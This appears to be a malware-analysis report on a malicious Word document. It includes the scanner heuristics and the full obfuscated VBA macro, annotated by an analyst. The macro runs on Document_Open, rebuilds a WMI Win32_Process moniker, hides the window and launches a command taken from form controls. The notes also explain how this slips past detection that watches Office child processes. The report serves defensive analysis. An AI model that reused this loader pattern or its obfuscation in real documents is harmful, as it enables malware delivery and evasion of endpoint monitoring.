MALICIOUS
172
Risk Score
Heuristics 7
-
ClamAV: Doc.Downloader.Generic-7469466-0 critical CLAMAV_DETECTION — ClamAV detected this file as malware: Doc.Downloader.Generic-7469466-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJ — GetObject call. Matched line in script:
Set Nxlvynsymqluh = GetObject(Omarpfde) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPEN — Document_Open macro. Matched line in script:
Private Sub Document_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
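Embedded URL info EMBEDDED_URL — One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body). This is the standard Office Open XML DrawingML namespace identifier rather than a payload or download address, so it has little value as an indicator.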
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12783 bytes |
SHA-256: 6403b5a288dab7046b4ca0b3dd7e349b76dfed983adc780dcc88884b3f1a3f74 |
|||
|
Detection
ClamAV:
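No threats found (this result covers only the extracted macros.bas source text; the original document was flagged by ClamAV as Doc.Downloader.Generic-7469466-0, per the heuristics above)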
Obfuscation or payload:
likely
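403 of 608 identifiers look randomly generated (e.g. 'hnkjKHK2222NNKLSess_') — consistent with name-mangling obfuscation. Note that the quoted example is a fragment of the junk delimiter string that the macro strips out with Split/Join, not a variable name, so the count appears to include tokens taken from string literals.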
|
|||
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "Xpkurgif"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Khytkvtzre, 0, 0, MSForms, TextBox"
' Analyst note: auto-execution entry point. Word runs Document_Open when the
' document is opened with macros enabled (this is the line the report's
' OLE_VBA_DOCOPEN heuristic matched).
' Almost everything in this body is padding: unused Dim declarations, and
' assignments of numeric literals, filler text strings, or never-assigned
' (empty) variables to other undeclared variables. None of those values are
' read again inside this procedure.
' The only statement with an effect is the bare call to Smadadpylqi below.
Private Sub Document_open()
Dim Nnhdbrror As Boolean
Dim Wsczyedinudly As Double
Hrefgwynxhaep = Bdbekiiwgi
Gnjbimekzjlkb = (Erxandetz)
Goyvywzaranf = 997
Dim Lujrsqcmcdfi As Boolean
Sbtkrofqldlp = "Maxime."
Dim Gfrlficj As Boolean
Dim Hsrulvqp As Boolean
Dim Hqgdoenuj As Integer
Cfbgxmtdz = (561)
Dim Grcywkepnw As Boolean
Dim Tqynxbvha As Double
Enqonjwlooykp = Hcqtrjczhpz
Dim Cekiquxlgwrfr As Integer
Dim Rufjmhtsrg As String
Dim Coiyolzikd As Double
Udebfynayrhm = (Lojltcsivwx)
Urcboemo = ("Neque rerum.")
Snssxnlh = (Yzlzyknbmih)
Dim Wtiwpsixb As Boolean
Ryajvukobk = Gccdrlbawogv
' Analyst note: the one live statement. Invokes the function Smadadpylqi
' (defined in module Shqcibig in this listing) and discards its return value.
Smadadpylqi
Dim Chuggarpi As String
Dim Qtprgutjyiqb As Boolean
Ydsxhuznccnfi = Wmdwaiqglavg
Ymgdhhxysbiv = (Meblqrcvmepq)
Hwloxvdqhbbuv = 576
Dim Cnefythzkplp As Boolean
Bnqaarvq = "Omnis excepturi voluptatem voluptatem aspernatur est."
Dim Howxzkvwfajqk As String
Dim Czxbymfzpg As Boolean
Dim Uufzmtgykw As Boolean
Auokcqkdgqyrx = (145)
Dim Mbpgrmzabzbxx As Integer
Dim Yfpyadxuwz As Boolean
Edwobwxtwv = Matnlbsmytss
Dim Osphshvcvwflz As Boolean
Dim Lqdpwlzk As String
Dim Vgilkldlci As String
Ocixkfwh = (Smndocfn)
Fyxamqklb = ("Suscipit earum maxime aut.")
Suhbahybuncis = (Yhwbfptxyqfil)
Dim Lfbfzsgcovhl As Boolean
Cqelqsdoatgy = Luznizcxgn
End Sub
Attribute VB_Name = "Rihhrozcvbo"
Attribute VB_Base = "0{67C962F7-255C-4A54-B746-5B48B0549899}{5BCEBDD0-328C-4442-8952-9E678F836C50}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Shqcibig"
' Analyst note: string-assembly helper. Returns one string concatenated from
' values held in document/form controls; its result is used as part of the
' first argument to the .Create call in Smadadpylqi.
' The control values themselves are NOT present in the extracted VBA source,
' so the final string cannot be recovered from macros.bas alone; it has to be
' read from the form/control storage of the original document.
' All other lines (unused Dims, assignments of literals, filler text or empty
' variables) are padding and do not feed the return value.
Function Gykjilth()
Dim Qeviyzyuj As String
Dim Jpqpoyydzky As Double
Bdukvcnrrdmg = Qjnybvvzy
Rszbfwrkbgu = (Ygbxrmdjdrh)
Mxyycetwdj = 725
Dim Lgvvjawezzu As String
Hmxfoarhsktmd = "Aperiam dolorem veniam."
Dim Lqvxnhgfhnt As Boolean
Dim Pmmdfauswr As Boolean
Dim Whswbjgwh As Integer
Dwfqbgpsuj = (734)
Dim Gxqhcjwpzgor As String
Dim Jgdnudvdigz As Double
Mgzuyppmylbd = Djxhnqoxjo
Dim Cwcokhtrkja As Double
Dim Bkbkubkitsu As Boolean
Dim Lsepwknjmsjka As Boolean
Vaujkslgnm = (Wgjeiclvan)
Pzfpsrzuhz = ("Josh")
Xlagzmrchxqd = (Bhpykifitlm)
Dim Vmufxuphxcf As Boolean
Wsericleqse = Eoproudzvpm
' Analyst note: live step 1. Reads the control Khytkvtzre on module Xpkurgif,
' which that module's Attribute VB_Control line declares as an MSForms TextBox.
Usevejolgkbmf = Xpkurgif.Khytkvtzre
Dim Ebklouvx As String
Dim Sanyvdfvm As Boolean
Uumgirzil = Paiodzfn
Hrhgccdxspvt = (Gyefcwoxgr)
Qhagqybpmd = 157
Dim Govlskev As String
Hevzkddkkpupm = "In voluptatem minus."
Dim Lyxsexcsdznad As String
Dim Mpgsavlqnymcs As Boolean
Dim Qczoglhdc As Boolean
Msaxcafpd = (396)
Dim Tvaaijtsuk As Double
Dim Jkaoykfmdrujt As Boolean
Vmxdmagjdng = Jjfvjurmblhey
Dim Cbrhrsxfx As Integer
Dim Wcbwasghcum As String
Dim Yzetaqyohahcw As Boolean
Fmdiotyoke = (Yrrlpbrjrod)
Hbpbuuetu = ("Dolores")
Qdkgaluoqba = (Prbepuqiybg)
Dim Mpkfvdobvm As Double
Jgtppfhezm = Aezlhrcdprye
' Analyst note: live step 2. Appends three members of Rihhrozcvbo. That module's
' VB_Base attribute carries class GUIDs, so it is presumably a UserForm and
' these are controls on it (default property read) - confirm against the form.
Mkcmnsggedoe = Usevejolgkbmf + Rihhrozcvbo.Ewydckuorvxx + Rihhrozcvbo.Dvophcgtsfed + Rihhrozcvbo.Yasxyxdwcied
Dim Skkwyalsqq As Double
Dim Mhjfhgcm As Boolean
Jqeefvzppt = Gdvkjejwaie
Rjniytptgburu = (Tbajiyafkwx)
Tlaltinl = 81
Dim Rzfuzcato As Integer
Dziudxrddlav = "Perferendis qui."
Dim Vaiymheh As Boolean
Dim Kcebdjdiok As Integer
Dim Srqkwiivqe As String
Ecruccovfzka = (913)
Dim Atisgbkjhri As Boolean
Dim Wyxrfjlxar As Integer
Mvugtgpsg = Nyxriuuamaq
Dim Hheqhszbzlufq As Boolean
Dim Ksjfojkshsc As Double
Dim Rwgvdxylc As String
Nhnnnclrrg = (Qldnxoxyfqtk)
Zbtecitzs = ("Qui quos.")
Wffgklzbcpjaj = (Fafwocjhdkymd)
Dim Rtwqaiss As Boolean
Tjbqpbjdf = Tvstnxbvmywt
' Analyst note: live step 3. Appends one more Rihhrozcvbo member and the .Tag
' property of another; data is being pulled from control metadata, not code.
Wbwwufouw = Mkcmnsggedoe + Rihhrozcvbo.Iiunyznb + Rihhrozcvbo.Zwwhxbbjtysnu.Tag
Dim Tfwjecjksyb As Boolean
Dim Gyusotyhtbxu As Boolean
Bzktbxlytzcyt = Rycfgjndmru
Zeypxehli = (Hhheuppawqcdv)
Powxbgye = 938
Dim Bmboufjtcxz As Double
Iwctcqxad = "Veniam."
Dim Psokdticiptco As Double
Dim Ksjtrang As Integer
Dim Znwnaoxn As String
Crypjpwstptoi = (893)
Dim Fqjiwcmak As Integer
Dim Mpiavpjmz As String
Ukbdumyglevg = Neiwprolddhkt
Dim Evbnmwzg As String
Dim Zbesbqinc As String
Dim Apjbfigywk As String
Cgittiaox = (Ppjsbmyxqls)
Slhoshvxg = ("Voluptatem aut occaecati.")
Msxpebtn = (Tlvpfmymctjcc)
Dim Bmvqusjuh As Double
Pitpsftgyz = Nvxkdcsjqwhdp
' Analyst note: sets the return value. Bvupupavcuz is never assigned in the
' visible listing, so it contributes nothing and the result is effectively
' Wbwwufouw.
Gykjilth = Bvupupavcuz + Wbwwufouw + Bvupupavcuz
Dim Dfkakixdpvtmb As Boolean
Dim Vyfauebhdhmj As String
Deobpequvdr = Zawepwhzatah
Xhtyyymm = (Lmpbbccia)
Hhcxmrrc = 525
Dim Tvctnbfswhn As Integer
Sdggxxrshjz = "Catherine"
Dim Qblhvjfrsrnio As Boolean
Dim Pedoxqktgkteu As Double
Dim Ldcnldhold As Boolean
Altyjxtcdgkti = (638)
Dim Fwcfkwhfj As String
Dim Ptiprlsr As Integer
Nmjhashfs = Ewbsjytct
Dim Sjhatoozar As Double
Dim Sksxkdzzqwvlw As Boolean
Dim Hnyoqbduaazyt As Integer
Iohxjirajztg = (Ovemrglccgxo)
Xlefjwohezxp = ("Ipsa.")
Ppwukymevm = (Iglbzusadx)
Dim Xvggrepcqym As Boolean
Ddrespsdzo = Dzcwqjrviwosf
End Function
' Analyst note: main routine, called from Document_open. Stripped of padding
' it performs these steps, in order:
'   1. rebuilds an object moniker string by removing a junk delimiter
'      (Split + Join) and splicing in a TextBox value;
'   2. binds to that object with GetObject (the line matched by the report's
'      OLE_VBA_GETOBJ heuristic);
'   3. builds a second moniker from the first plus control properties, binds
'      to it with GetObject, and sets its XSize / YSize properties to False;
'   4. calls .Create on the first object, passing the string returned by
'      Gykjilth and the second object, and repeats while the call returns a
'      non-zero value.
' Everything else (unused Dims, assignments of literals, filler text or empty
' variables) is padding and is never read again.
' NOTE(review): the argument shape of .Create (string, value, object, value)
' is consistent with WMI Win32_Process.Create(CommandLine, CurrentDirectory,
' ProcessStartupInformation, ProcessId), with the second object being a
' Win32_ProcessStartup instance - confirm once the control values are
' recovered. If so, the child process is started by the WMI provider host
' rather than by Word, so detections that only look for Office applications
' spawning child processes will not see it; WMI activity and process-creation
' telemetry for the provider host are the places to look.
Function Smadadpylqi()
Dim Fefnkjmlp As Boolean
Dim Nktytanrfgjg As String
Klnenhphuw = Vvxfquwi
Pgvllkcbvxi = (Yzhckffp)
Tfruaqpko = 133
Dim Vhicveftausq As String
Gjrldjasacgtp = "Et voluptatem."
Dim Gmtjfcsyao As String
Dim Wwlbowvt As Boolean
Dim Yllucggwcodiu As Boolean
Hpwokrxdidwpa = (82)
Dim Uieiniylalsdm As Integer
Dim Obddhgyfwgbic As Double
Rfeftudmt = Ewcsnlrlpu
Dim Kqwchbmavutun As Double
Dim Rckpjnybc As Double
Dim Sqqqbmfh As Double
Xrwkhpmkdif = (Zjeebkmp)
Diwjfshpfftuk = ("Quod quia molestiae.")
Cxlqzuzel = (Whdwhydss)
Dim Fhrvszilfy As Integer
Znayueeeksxwz = Xuqswdrrdz
' Analyst note: the junk delimiter used by the Split call further down.
iwoowjjjjj = "_&&*8992307&)hnkjKHK2222NNKLS"
Dim Lprrcwjh As String
Dim Zjmbemmguoux As Boolean
Vywcvusoobbxd = Dicqurzif
Dmbtgoysve = (Lzdlukzhi)
Qgrhwhwprciqf = 13
Dim Vnyladdbqqrg As Double
Ftennknogckzo = "Odit optio id."
Dim Cjxyapmix As Boolean
Dim Nfareasrljecs As String
Dim Ggwaaovwn As Double
Idjtkgxqxinp = (705)
Dim Gwwuygfvti As Integer
Dim Xohrimjlso As Integer
Yyebfysryqur = Paomkaoz
Dim Jfabfmrsoe As Double
Dim Bdpvqnngupsgw As String
Dim Fehezpvszxrlm As Integer
Cufqykwo = (Lcotmtew)
Nhawkglqxz = ("Beatae perspiciatis voluptas neque.")
Htmyagkm = (Xdnmhynempx)
Dim Vujgszgqlyl As Boolean
Hotylccxkwix = Ctmmduereq
' Analyst note: string de-obfuscation, part 1. The literal is short fragments
' separated by the delimiter above (one delimiter is itself split across a
' "+" concatenation to break up simple string matching). The fragments are
' "wi", "nm", "gmt", "s:W", "in", "32_", <value of TextBox Xpkurgif.Khytkvtzre>,
' "roc", "ess". Split turns them into an array.
Mctupaxleempp = Split("_&&*8992307&)hnkjKHK2222NNKLSwi_&&*8992307&)hnkjKHK2222NNKLSnm_&&*8992307&)hnkjKHK2222NNKLSgmt_&&*8992307&)hnkjKH" + "K2222NNKLSs:W_&&*8992307&)hnkjKHK2222NNKLSin_&&*8992307&)hnkjKHK2222NNKLS32_" + Xpkurgif.Khytkvtzre + "_&&*8992307&)hnkjKHK2222NNKLSroc_&&*8992307&)hnkjKHK2222NNKLSess_&&*8992307&)hnkjKHK2222NNKLS", iwoowjjjjj)
Dim Dxrcjcmf As Integer
Dim Dulxlppuoag As Integer
Autzvqrjx = Pxztrnvlqo
Ajjmrwlmvgrqh = (Rpdgffah)
Vcbfuhruwsp = 867
Dim Zmmdpifi As String
Kevmhata = "Aut vero ut."
Dim Wvukhazawlxnf As Boolean
Dim Ttblyihj As String
Dim Ayujtcsnphd As String
Vojfmbew = (299)
Dim Inhrpdnpms As String
Dim Ceqciezpe As Integer
Rfwpdvhx = Olwmldkc
Dim Zhpmeojtzwje As Double
Dim Plsoktevze As Double
Dim Upwbpnmibkqj As Double
Loxxrjcjxzk = (Yneikzlutwy)
Rakfvidwipxcm = ("Qui ut earum fuga ducimus repellat nemo.")
Ksxqtwovxcf = (Urszqvrcysebs)
Dim Xgfxvvjbzhn As Boolean
Fndpyecq = Mrlolaspbbyyq
' Analyst note: string de-obfuscation, part 2. Joining with "" drops the
' delimiter, giving "winmgmts:Win32_" & <TextBox value> & "rocess".
' Presumably the TextBox holds "P" (-> a WMI Win32_Process moniker); the
' control's value is not part of this listing - verify against the document.
Omarpfde = Join(Mctupaxleempp, "")
Dim Xqdgyqgiodg As Boolean
Dim Elserynb As Boolean
Vrahzefs = Hpyjusgcizf
Jwnbysnaokn = (Xjhdjkrnvpn)
Ysktmxvbrl = 862
Dim Gacqtekc As String
Xvequjbngzso = "Voluptatem."
Dim Pvxqlmfxvbck As String
Dim Ckdgdduoowclz As String
Dim Mjsghbygt As Double
Pzadnkuflvvl = (593)
Dim Aagaozmbtjr As Integer
Dim Hvdekqkn As Integer
Ljsrutiqxhq = Sffqgofq
Dim Gmjhrlva As Double
Dim Mvrvisiks As Integer
Dim Navlyfad As Double
Xzflfllqecg = (Owojiogv)
Atlowtguxdpo = ("In.")
Jchwtnqvay = (Jvspstzhesu)
Dim Xyijjmzbcaf As Double
Bjbftmghjl = Lvoohqijh
' Analyst note: binds to the object named by the rebuilt moniker. This is the
' line quoted by the report's GetObject heuristic.
Set Nxlvynsymqluh = GetObject(Omarpfde)
Dim Bwnndnsvdcw As Integer
Dim Ikddspezpuq As String
Attclxfnivjiy = Uhfqdwymenvv
Mcwkgnycbqz = (Zptuurle)
Zzachooqbmw = 74
Dim Myrlusforpty As Double
Tbegmemxkg = "Molestias perferendis."
Dim Nmaxafdwhwc As Boolean
Dim Lbahjgdkduox As Double
Dim Rgonlaceso As Integer
Nvadxyyoacl = (936)
Dim Zggkslau As String
Dim Qsiqfohjmn As Double
Ikaxpzrkouym = Wuacuvsjjloh
Dim Ttzdggyv As String
Dim Vbckxwtvemsm As Double
Dim Szzzbpihgr As Integer
Vvgfvakggssh = (Rsdghglokhh)
Uloultcaxpzq = ("Facere eum eaque tenetur aliquam quo.")
Cdagsonx = (Ajkjglzyw)
Dim Usyhoimtddp As Boolean
Jkjaokhxw = Bjtumqbumlhl
' Analyst note: starts a second moniker: the first one extended with the
' ControlTipText of two Rihhrozcvbo controls (text stored in control
' metadata, not visible in the extracted source).
Zrzqzhzrrhbi = Omarpfde + Rihhrozcvbo.Qngqytra.ControlTipText + Rihhrozcvbo.Wbnlesyzfb.ControlTipText
Dim Zutxvimoaswkk As String
Dim Xwkhsrtwbqw As Integer
Wtubctzw = Erdbkfajknsuc
Cggyrgyolshy = (Rlshxgppq)
Bhlhicqqgam = 729
Dim Ytfdrjdgfbtba As String
Xemqyhpym = "Dolorum."
Dim Pqhohesu As Integer
Dim Alxgekwf As String
Dim Ioktbnwuq As String
Swptnzqupife = (139)
Dim Tojtxtsubtbfo As String
Dim Ixeajipinrkf As Double
Xdkiwiym = Pbyvvshkebgl
Dim Sodgvcmn As String
Dim Dqqxsduvwllh As Boolean
Dim Nvkzbjwmcgpi As Boolean
Qygbtgrebjsa = (Ootlejsasm)
Vrokhjybfxfjn = ("Quas dicta sapiente earum et sit.")
Juahbclx = (Ddvapgtqvkz)
Dim Cicffqjjyah As Double
Rfkvkuaxd = Bprltrtc
' Analyst note: completes the second moniker by appending the same TextBox
' value that was spliced into the first one.
Aaxlecvxu = Zrzqzhzrrhbi + Xpkurgif.Khytkvtzre
Dim Mgmsumnfphq As String
Dim Edizhqtr As Boolean
Jmaumyfjg = Kdooaufvgj
Zvimkqjjxoz = (Trbgjyjyq)
Tlgvovswgwbyd = 999
Dim Twamveligdeo As Boolean
Tribjszjnv = "Felix"
Dim Cxjstyupfmyey As Boolean
Dim Czsjhvlme As String
Dim Utvjjekzbozok As Boolean
Gggtecnkwjul = (344)
Dim Rkfzwdbu As Integer
Dim Ttzuudli As Integer
Offkotgjyao = Yjduoncsmkd
Dim Dtptxmhgmm As Double
Dim Lcwsvupzdakq As Boolean
Dim Uavcuckeqntfc As Double
Jmxyzdlfzq = (Zhciyjarglj)
Jgljyqrn = ("A voluptas placeat magni.")
Onsjtjvvleol = (Evvckexcfwp)
Dim Wbaxalnnvgagi As Boolean
Ynnyjxfdvpd = Lhvtxjztlgnzk
' Analyst note: binds to the second object and stores it in the function's own
' name (i.e. the return-value slot), which is then used as an ordinary object
' variable for the rest of the routine.
Set Smadadpylqi = GetObject(Aaxlecvxu)
Dim Bhjkcgzb As Double
Dim Gyidqeekwd As String
Zjtjrdwflo = Jjbyphdt
Ixdxdtutbnqq = (Qtowefysngugc)
Pztleawftzcl = 221
Dim Xltcchwtho As Double
Pkxdxqoxmnxfc = "Vitae quidem commodi."
Dim Nuwcuffpuaea As String
Dim Vseqhllhpclwu As String
Dim Onzdniylma As Integer
Udcsqqzqvs = (159)
Dim Nifetqxkgfgn As Double
Dim Kqxgrqqbrenkv As String
Iovzdpfdtrwdg = Wpmsgitpbye
Dim Arjuqpxrkob As Double
Dim Mepunkxch As String
Dim Dampzuazcocbi As Integer
Rgwmbkkawo = (Lupotulrq)
Sqncfrkcg = ("Quia et ut.")
Trgvwmtz = (Znpenzjh)
Dim Voydvoiejl As Integer
Nkbxixyyyrlg = Yxrravkh
' Analyst note: sets the XSize property of the second object to False.
' NOTE(review): XSize/YSize are window-size fields on a WMI process-startup
' object; presumably this is meant to keep the launched window from being
' visible - confirm.
Smadadpylqi.XSize = False
Dim Exlcwdopyaien As String
Dim Isnqnzshrze As Boolean
Sudpdxtaixjh = Ueuxjgggecufw
Udsctxdwtap = (Audjpaycxbu)
Lpauybikour = 721
Dim Cqhawuhq As Boolean
Zlpwnmwcxi = "Nihil et aliquam."
Dim Nwzcorfmam As String
Dim Yhvxeamxff As Double
Dim Ifvxrsuvzq As Integer
Aufqktkmfd = (343)
Dim Rzxwvhgiv As String
Dim Iviuhrjmhekw As String
Wnlvodehpfsu = Rjupkawubycvv
Dim Ahdnczuungn As Double
Dim Gdcnukux As Integer
Dim Ljxblmsthnro As String
Hvzxphjxlvo = (Palwsqnrdeyjh)
Gbkrfofzkxi = ("Aliquam.")
Oxcnmqdsvq = (Kwdrbnhmvrjlw)
Dim Jbbzjncdg As Boolean
Wqrukllsur = Jjbqpxorq
' Analyst note: same as above for the YSize property.
Smadadpylqi.YSize = False
Dim Wycxobshkpjfp As String
Dim Tojaoxgbvrb As String
Rfymxcfhlzz = Obsoralmcz
Mcpwgfnp = (Frxinmihpjw)
Ejhaabcof = 191
Dim Kzqlfumohy As Integer
Qinydvja = "Commodi perspiciatis accusamus itaque."
Dim Uknzemnbbz As String
Dim Xnwxcvxhvj As String
Dim Qrncysvng As Integer
Fxgpzagwv = (395)
Dim Kzcgtodx As String
Dim Bginzldjep As Double
Irzwfxgpnnimg = Rzgjjmvd
Dim Capdnrjynrlhw As String
Dim Qzxoxvgll As String
Dim Xfwknnhydx As String
Zvyosxokcx = (Mxptcwpdreue)
Dxzyghzn = ("Ignacio")
Zhnowagzbdyp = (Wginuvbtlpt)
Dim Erwtyzxuui As Boolean
Rxudyeoam = Zltcrfvxufpci
' Analyst note: the execution step. Calls .Create on the first object with:
'   arg 1: KSNNSN & Gykjilth - KSNNSN is never assigned in the visible
'          listing (empty), so this is the string assembled by Gykjilth from
'          form-control values;
'   arg 2 and arg 4: Dslfpjqnbuf / Umeqbrcvl - never assigned in the visible
'          listing;
'   arg 3: the second object configured above.
' The empty Do While / Loop re-issues the call for as long as it returns a
' non-zero (truthy) value and stops on a zero return. Gykjilth is re-evaluated
' on every iteration.
Do While Nxlvynsymqluh.Create(KSNNSN & Gykjilth, Dslfpjqnbuf, Smadadpylqi, Umeqbrcvl)
Loop
Dim Coquzqyrn As Boolean
Dim Vqlleenwoqape As Boolean
Jhixkwacafcaf = Jrreycntcmt
Obymcdgr = (Zzvnkgcdhjz)
Yzstvnfkrp = 780
Dim Zgpycgwbbrf As Integer
Cmajlxchsan = "Eaque rerum officiis."
Dim Lddfhjxylz As Integer
Dim Ecdfhgupe As String
Dim Fbfsvhgg As Double
Tusxwjvgqrn = (322)
Dim Huzbltsu As Boolean
Dim Cxdcrbrftjqk As Boolean
Ikwzjobnrx = Wfumkupcqzshd
Dim Ltdnwmotbwtlp As Boolean
Dim Ggdtflkgzwv As Double
Dim Irpveqpunkck As Double
Tqqjalbtmd = (Mbneqahukjhyg)
Uswbjyyq = ("Voluptatum corporis labore.")
Nvttoellgd = (Jtbdmbjis)
Dim Lgbqcazn As String
Udfnbwfwmavmo = Afmxhhrk
End Function
|
|||